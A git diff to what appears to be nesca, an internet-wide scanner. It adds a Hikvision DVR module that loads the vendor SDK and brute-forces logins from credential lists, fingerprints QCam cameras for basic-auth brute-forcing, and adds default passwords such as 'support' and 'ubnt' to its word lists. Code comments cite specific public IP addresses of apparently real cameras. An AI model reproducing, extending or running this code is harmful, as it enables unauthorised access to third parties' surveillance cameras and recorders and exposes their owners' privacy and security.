diff --git a/Connector.cpp b/Connector.cpp index f2de3a7..843af48 100644 --- a/Connector.cpp +++ b/Connector.cpp @@ -106,10 +106,6 @@ int my_trace(CURL *handle, curl_infotype type, return 0; } -//struct MemoryStruct { -// char *memory; -// size_t size; -//}; size_t nWriteCallback(void *contents, size_t size, size_t nmemb, void *userp) { size_t realsize = size * nmemb; @@ -141,16 +137,9 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, const std::string *lpString, bool digestMode){ buffer->clear(); - //buffer->reserve(100000); int res = 0; CURL *curl = curl_easy_init(); - //struct MemoryStruct chunk; - - //chunk.memory = (char*)malloc(1); /* will be grown as needed by the realloc above */ - //chunk.size = 0; /* no data at this point */ - //std::string buffer2; - if (curl != NULL) { curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); @@ -199,12 +188,7 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, { curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); res = curl_easy_perform(curl); - - //if (chunk.size > 0){ - // //buffer2 = std::string(chunk.memory); - // buffer->append(chunk.memory, chunk.size); - //} - + if (port != 21 && lpString != NULL) { int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); if (pos != -1) { @@ -215,34 +199,30 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, else res = curl_easy_perform(curl); } else res = curl_easy_perform(curl); - - //if (chunk.size > 0){ - // //buffer2 = std::string(chunk.memory); - // buffer->append(chunk.memory, chunk.size); - //} - + int sz = buffer->size(); if (res == CURLE_OK || - (port == 21 && buffer->size() > 0)) { + (port == 21 && sz > 0)) { if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - Activity += buffer->size(); + Activity += sz; curl_easy_cleanup(curl); - return buffer->size(); + return sz; } else { - curl_easy_cleanup(curl); if (res == 6) return -2; + if (res == 56 && port == 8000) return 1; //Hikvision else if (res != 28 && res != 7 && res != 13 && res != 67 && res != 52 && - res != 55 && res != 56 && + res != 55 && res != 35 && res != 19 && - res != 23) { + res != 23) + { if (res == 5) { stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. "); return -2; @@ -260,202 +240,21 @@ int Connector::nConnect(const char* ip, const int port, std::string *buffer, } else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + QString(ip) + ":" + QString::number(port)); + } else return sz; + + if (res == 23 && sz > 0) { + return sz; } - - if(res == 23 && buffer->size() > 0) { - if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]")); - return buffer->size(); - } else return -1; + else return -1; } if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); - return buffer->size(); + return sz; } else { stt->doEmitionRedFoundData("Curl error."); return -1; }; } -// -//int Connector::nConnect2(const char* ip, const int port, std::string *buffer, -// const char *postData, -// const std::vector *customHeaders, -// const std::string *lpString, -// bool digestMode) -//{ -// buffer->clear(); -// -// int still_running; -// struct timeval timeout; -// int res = 0; -// CURL *curl = curl_easy_init(); -// -// if (curl != NULL) -// { -// curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1L); -// if (MapWidgetOpened) { -// struct data config; -// config.trace_ascii = 1; /* enable ascii tracing */ -// curl_easy_setopt(curl, CURLOPT_DEBUGFUNCTION, my_trace); -// curl_easy_setopt(curl, CURLOPT_DEBUGDATA, &config); -// curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); -// } -// curl_easy_setopt(curl, CURLOPT_URL, ip); -// curl_easy_setopt(curl, CURLOPT_PORT, port); -// curl_easy_setopt(curl, CURLOPT_USERAGENT, -// "Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0"); -// curl_easy_setopt(curl, CURLOPT_HEADER, 1L); -// curl_easy_setopt(curl, CURLOPT_AUTOREFERER, 1L); -// curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); -// curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); -// curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, nWriteCallback); -// curl_easy_setopt(curl, CURLOPT_WRITEDATA, buffer); -// int proxyPort = std::atoi(gProxyPort); -// if (strlen(gProxyIP) != 0 && (proxyPort > 0 && proxyPort < 65535)) { -// curl_easy_setopt(curl, CURLOPT_PROXY, gProxyIP); -// curl_easy_setopt(curl, CURLOPT_PROXYPORT, proxyPort); -// } -// else { -// curl_easy_setopt(curl, CURLOPT_PROXY, ""); -// } -// curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); -// curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, gTimeOut); -// curl_easy_setopt(curl, CURLOPT_TIMEOUT, gTimeOut + 3); -// -// if (postData != NULL) curl_easy_setopt(curl, CURLOPT_POSTFIELDS, postData); -// -// if (customHeaders != NULL) { -// struct curl_slist *chunk = NULL; -// for (auto &ch : *customHeaders) chunk = curl_slist_append(chunk, ch.c_str()); -// curl_easy_setopt(curl, CURLOPT_HTTPHEADER, chunk); -// } -// -// if (lpString != NULL) { -// curl_easy_setopt(curl, CURLOPT_UNRESTRICTED_AUTH, 1L); -// curl_easy_setopt(curl, CURLOPT_FTPLISTONLY, 1L); -// curl_easy_setopt(curl, CURLOPT_USERPWD, lpString->c_str()); -// if (digestMode) curl_easy_setopt(curl, CURLOPT_HTTPAUTH, (long)CURLAUTH_DIGEST); -// } -// -// -// CURLM *multi_handle = curl_multi_init(); -// if (multi_handle == NULL) stt->doEmitionRedFoundData("curl_multi_init == NULL!"); -// curl_multi_add_handle(multi_handle, curl); -// -// do { res = curl_multi_perform(multi_handle, &still_running); } -// while (res == CURLM_CALL_MULTI_PERFORM); -// -// while (still_running) { -// fd_set fdread; -// fd_set fdwrite; -// fd_set fdexcep; -// int maxfd = -1; -// -// FD_ZERO(&fdread); -// FD_ZERO(&fdwrite); -// FD_ZERO(&fdexcep); -// -// timeout.tv_sec = gTimeOut; -// timeout.tv_usec = 0; -// -// curl_multi_fdset(multi_handle, &fdread, &fdwrite, &fdexcep, &maxfd); -// -//#ifdef _WIN32 -// Sleep(100); -//#else -// struct timeval wait = { 0, 100 * 1000 }; /* 100ms */ -// rc = select(0, NULL, NULL, NULL, &wait); -//#endif -// -// /* get file descriptors from the transfers */ -// switch (select(maxfd + 1, &fdread, &fdwrite, &fdexcep, &timeout)) { -// case -1: -// /* select error */ -// still_running = 0; -// stt->doEmitionRedFoundData("select() returns error, this is badness"); -// break; -// case 0: -// default: -// /* timeout or readable/writable sockets */ -// do -// { -// res = curl_multi_perform(multi_handle, &still_running); -// } while (res == CURLM_CALL_MULTI_PERFORM); -// break; -// } -// } -// -// curl_multi_remove_handle(multi_handle, curl); -// curl_multi_cleanup(multi_handle); -// curl_easy_cleanup(curl); -// -// if (res == CURLE_OK || -// (port == 21 && buffer->size() > 0)) { -// -// if (digestMode) -// { -// if (port != 21 && lpString != NULL) { -// int pos = Utils::ustrstr(*buffer, "\r\n\r\n"); -// if (pos != -1) { -// *buffer = buffer->substr(pos + 4); -// } -// } -// } -// -// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); -// Activity += buffer->size(); -// return buffer->size(); -// } -// else { -// if (res == 6) return -2; -// else if (res != 28 && -// res != 7 && -// res != 67 && -// res != 52 && -// res != 55 && -// res != 56 && -// res != 35 && -// res != 19 && -// res != 23) { -// if (res == 5) { -// stt->doEmitionRedFoundData("Couldn't resolve proxy. The given proxy host could not be resolved. "); -// return -2; -// } -// else if (res == 13) { -// stt->doEmitionFoundData("Unknown ftp. (" + QString::number(res) + ") " + -// QString(ip) + ":" + QString::number(port)); -// return -2; -// } -// else if (res == 8) { -// stt->doEmitionFoundData("Strange ftp reply. (" + -// QString::number(res) + ") " + QString(ip) + -// ":" + QString::number(port)); -// return -2; -// } -// else if (res == 18) { -// stt->doEmitionFoundData("Inappropriate file size. (" + -// QString::number(res) + ") " + QString(ip) + -// ":" + QString::number(port)); -// return -2; -// } -// else stt->doEmitionRedFoundData("CURL error: (" + QString::number(res) + ") " + -// QString(ip) + ":" + QString::number(port)); -// } -// -// if (res == 23 && buffer->size() > 0) { -// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString("[OVERFLOW]")); -// return buffer->size(); -// } -// else return -1; -// } -// -// if (MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(buffer->c_str())); -// return buffer->size(); -// } -// else { -// stt->doEmitionRedFoundData("Curl error."); -// return -1; -// }; -//} int Connector::connectToPort(char* ip, int port) { @@ -467,7 +266,7 @@ int Connector::connectToPort(char* ip, int port) std::string buffer; int size = 0; - if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); + if (port == 22) size = SSHAuth::SSHLobby(ip, port, &buffer); //SSH else size = nConnect(ip, port, &buffer); if(size > 0) diff --git a/HikvisionLogin.cpp b/HikvisionLogin.cpp new file mode 100644 index 0000000..f43b56a --- /dev/null +++ b/HikvisionLogin.cpp @@ -0,0 +1,62 @@ +#include "HikvisionLogin.h" +#include "externData.h" +#include "FileUpdater.h" + +bool HikVis::isInitialized = false; + +void HikVis::hikInit(){ + //hik_init_ptr(); +} + +void HikVis::hikCleanup(){ + //hik_cleanup_ptr(); +} + +lopaStr HikVis::hikLogin(const char * sDVRIP, int wDVRPort) +{ + lopaStr lps = { "UNKNOWN", "", "" }; + int passCounter = 0; + + for (int i = 0; i < MaxLogin; ++i) { + for (int j = 0; j < MaxPass; ++j) { + FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready; }); + if (!globalScanFlag) return lps; + + NET_DVR_DEVICEINFO_V30 *info; + hik_init_ptr(); + if (hik_login_ptr(sDVRIP, wDVRPort, loginLst[i], passLst[j], info) == 0) { + strcpy(lps.login, loginLst[i]); + strcpy(lps.pass, passLst[j]); + hik_cleanup_ptr(); + return lps; + } + hik_cleanup_ptr(); + + if (BALogSwitched) stt->doEmitionBAData("HV: " + QString(sDVRIP) + ":" + QString::number(wDVRPort) + + "; l/p: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" + + QString::number((++passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)"); + + Sleep(100); + } + } + + return lps; +} + +lopaStr HikVis::HVLobby(const char *ip, const int port) { + if (gMaxBrutingThreads > 0) { + + while (BrutingThrds >= gMaxBrutingThreads) Sleep(1000); + + ++baCount; + ++BrutingThrds; + const lopaStr &lps = hikLogin(ip, port); + --BrutingThrds; + + return lps; + } + else { + lopaStr lps = { "UNKNOWN", "", "" }; + return lps; + } +} \ No newline at end of file diff --git a/HikvisionLogin.h b/HikvisionLogin.h new file mode 100644 index 0000000..e52397e --- /dev/null +++ b/HikvisionLogin.h @@ -0,0 +1,25 @@ +#ifndef HIKVISIONLOGIN_H +#define HIKVISIONLOGIN_H + +#include "STh.h" +#include "mainResources.h" + +class HikVis { +public: static bool isInitialized; + +private: lopaStr hikLogin(const char * sDVRIP, int wDVRPort); + +public: + HikVis(){ + hikInit(); + } + ~HikVis(){ + hikCleanup(); + } + + void hikInit(); + void hikCleanup(); + lopaStr HVLobby(const char *ip, const int port); +}; + +#endif // UTILS_H \ No newline at end of file diff --git a/externFunctions.h b/externFunctions.h index 15bc901..ab6e96e 100644 --- a/externFunctions.h +++ b/externFunctions.h @@ -1,6 +1,8 @@ #ifndef EF_H #define EF_H +#include + extern std::string toLowerStr(const char *str); extern char* strstri(const char *_Str, const char *_SubStr); diff --git a/finder.cpp b/finder.cpp index c1df1f9..73efbaf 100644 --- a/finder.cpp +++ b/finder.cpp @@ -11,6 +11,7 @@ #include "FileUpdater.h" #include "IPCAuth.h" #include +#include "HikvisionLogin.h" unsigned char tl(unsigned char d) { @@ -395,6 +396,9 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const && Utils::ustrstr(buffcpy, "jsmain/liveview.js") != -1 ) return 54; //Beward (http://46.146.243.88:88/login.asp) + if (Utils::ustrstr(buffcpy, "get_status.cgi") != -1 + && Utils::ustrstr(buffcpy, "str_device+") != -1) return 55; //QCam (http://1.177.123.118:8080/) + if(((Utils::ustrstr(buffcpy, "220") != -1) && (port == 21)) || (Utils::ustrstr(buffcpy, "220 diskStation ftp server ready") != -1) || (Utils::ustrstr(buffcpy, "220 ftp server ready") != -1) @@ -2334,7 +2338,18 @@ int Lexems::header(char *ip, int port, const char *str, Lexems *l, PathStr *ps, int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lexems *lx) { - if (port == 22) + if (HikVis::isInitialized && port == 8000) { + HikVis hv; + lopaStr lps = hv.HVLobby(ip, port); + if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + { + _specFillerBA(ip, port, "[Hikvision] iVMS client required.", lps.login, lps.pass, 0); + fillGlobalLogData(ip, port, std::to_string(size).c_str(), "[Hikvision] iVMS client required ().", + lps.login, lps.pass, "[Hikvision] iVMS", "UTF-8", "Basic Authorization"); + return -1; + }; + } + else if (port == 22) { _saveSSH(ip, 22, size, buffcpy->c_str()); return -1; @@ -2603,6 +2618,10 @@ int Lexems::filler(char* ip, int port, const std::string *buffcpy, int size, Lex { _specWEBIPCAMBrute(ip, port, "[BEWARD] WEB IP Camera", flag, "WEB Authorization", cp, size, "BEWARD"); } + else if (flag == 55) //QCam + { + _specBrute(ip, port, "IP Camera", flag, "/videostream.cgi", "Basic Authorization", cp, size); + } else if (flag == 20) //AXIS Camera { if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) { diff --git a/login.txt b/login.txt index c3ae602..deaf188 100644 --- a/login.txt +++ b/login.txt @@ -2,6 +2,7 @@ admin root 123123 123456 +support 12345 cisco @@ -30,4 +31,5 @@ cgadmin 888888 777777 555555 -111222333 \ No newline at end of file +111222333 +ubnt \ No newline at end of file diff --git a/mainResources.h b/mainResources.h index c9d4405..85f1972 100644 --- a/mainResources.h +++ b/mainResources.h @@ -1,4 +1,4 @@ -#pragma once +#pragma once #include "base64.h" #include @@ -90,6 +90,28 @@ typedef int BOOL; #define MAX_ADDR_LEN 128 #endif +struct NET_DVR_DEVICEINFO_V30 +{ + unsigned char sSerialNumber; //序列号 + unsigned char byAlarmInPortNum; //报警输入个数 + unsigned char byAlarmOutPortNum; //报警输出个数 + unsigned char byDiskNum; //硬盘个数 + unsigned char byDVRType; //设备类型, 1:DVR 2:ATM DVR 3:DVS ...... + unsigned char byChanNum; //模拟通道个数 + unsigned char byStartChan; //起始通道号,例如DVS-1,DVR - 1 + unsigned char byAudioChanNum; //语音通道数 + unsigned char byIPChanNum; //最大数字通道个数 + unsigned char byZeroChanNum; //零通道编码个数 //2010-01-16 + unsigned char byMainProto; //主码流传输协议类型 0-private, 1-rtsp + unsigned char bySubProto; //子码流传输协议类型0-private, 1-rtsp + unsigned char bySupport; //能力,位与结果为0表示不支持,1表示支持, + unsigned char bySupport1; // 能力集扩充,位与结果为0表示不支持,1表示支持 + unsigned char byRes1; + int wDevType; //设备型号 + + unsigned char byRes2; //保留 +}; + struct PathStr{ char codepage[32]; char headr[TITLE_MAX_SIZE]; @@ -136,3 +158,17 @@ public: int size, Lexems *lx); }; + +//Hikvision SDK extern functions +//typedef int(__stdcall *f_func)(); +typedef void(__stdcall *NET_DVR_Init)(); +typedef void(__stdcall *NET_DVR_Cleanup)(); +typedef int(__stdcall *NET_DVR_Login_V30)(const char * sDVRIP, + int wDVRPort, + const char * sUserName, + const char * sPassword, + NET_DVR_DEVICEINFO_V30 *lpDeviceInfo); + +extern NET_DVR_Init hik_init_ptr; +extern NET_DVR_Cleanup hik_cleanup_ptr; +extern NET_DVR_Login_V30 hik_login_ptr; \ No newline at end of file diff --git a/negatives.txt b/negatives.txt index 6158b1b..a468da0 100644 --- a/negatives.txt +++ b/negatives.txt @@ -1,3 +1,6 @@ +Analog Telephone Adapter +IP Dect - +AnyGate Unable to open WebDAV Ruckus Wireless diff --git a/nesca_3.cpp b/nesca_3.cpp index 8b7d665..bb74c19 100644 --- a/nesca_3.cpp +++ b/nesca_3.cpp @@ -16,6 +16,11 @@ #include #include "progressbardrawer.h" #include "FileDownloader.h" +#include "HikvisionLogin.h" + +NET_DVR_Init hik_init_ptr = NULL; +NET_DVR_Cleanup hik_cleanup_ptr = NULL; +NET_DVR_Login_V30 hik_login_ptr = NULL; QDate date = QDate::currentDate(); int ver = 100*(100*(date.year()%100) + date.month()) + date.day(); @@ -2929,6 +2934,41 @@ QString GetColorCode(int mode, QString str) return result; } +void enableHikvisionSupport(){ + HINSTANCE hGetProcIDDLL = LoadLibrary(L".\\HCNetSDK.dll"); + + if (!hGetProcIDDLL) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not load HCNetSDK.dll! Hikvision support disabled."); + return; + } + + hik_init_ptr = (NET_DVR_Init)GetProcAddress(hGetProcIDDLL, "NET_DVR_Init"); + if (!hik_init_ptr) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not locate hikInit()! Hikvision support disabled."); + return; + } + + hik_login_ptr = (NET_DVR_Login_V30)GetProcAddress(hGetProcIDDLL, "NET_DVR_Login_V30"); + if (!hik_login_ptr) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not locate hikLogin()! Hikvision support disabled."); + return; + } + + hik_cleanup_ptr = (NET_DVR_Cleanup)GetProcAddress(hGetProcIDDLL, "NET_DVR_Cleanup"); + if (!hik_cleanup_ptr) { + HikVis::isInitialized = false; + stt->doEmitionRedFoundData("Could not locate hikCleanup()! Hikvision support disabled."); + return; + } + + HikVis::isInitialized = true; + stt->doEmitionGreenFoundData("Hikvision support enabled."); +} + + nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent) { setWindowFlags(Qt::FramelessWindowHint); @@ -2990,7 +3030,8 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent) qApp->quit(); }; #endif - + + std::thread fuThread(FileDownloader::checkWebFiles); fuThread.detach(); @@ -2998,6 +3039,12 @@ nesca_3::nesca_3(QWidget *parent) : QMainWindow(parent) _startMsgCheck(); qrp.setMinimal(true); drawVerboseArcs(0); + + //[5.39.163.202] 8000 (? ) open + +#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) + enableHikvisionSupport(); +#endif } nesca_3::~nesca_3() diff --git a/pass.txt b/pass.txt index 8319df2..d129721 100644 --- a/pass.txt +++ b/pass.txt @@ -17,6 +17,7 @@ qwerty meinsm monitor user +support test sysadm admin123 @@ -54,4 +55,5 @@ backup fujiyama super P@ssw0rd -passw0rd \ No newline at end of file +passw0rd +ubnt \ No newline at end of file diff --git a/version b/version index fc7153c..88bf941 100644 --- a/version +++ b/version @@ -1 +1 @@ -24B99-78C \ No newline at end of file +24B9C-72B \ No newline at end of file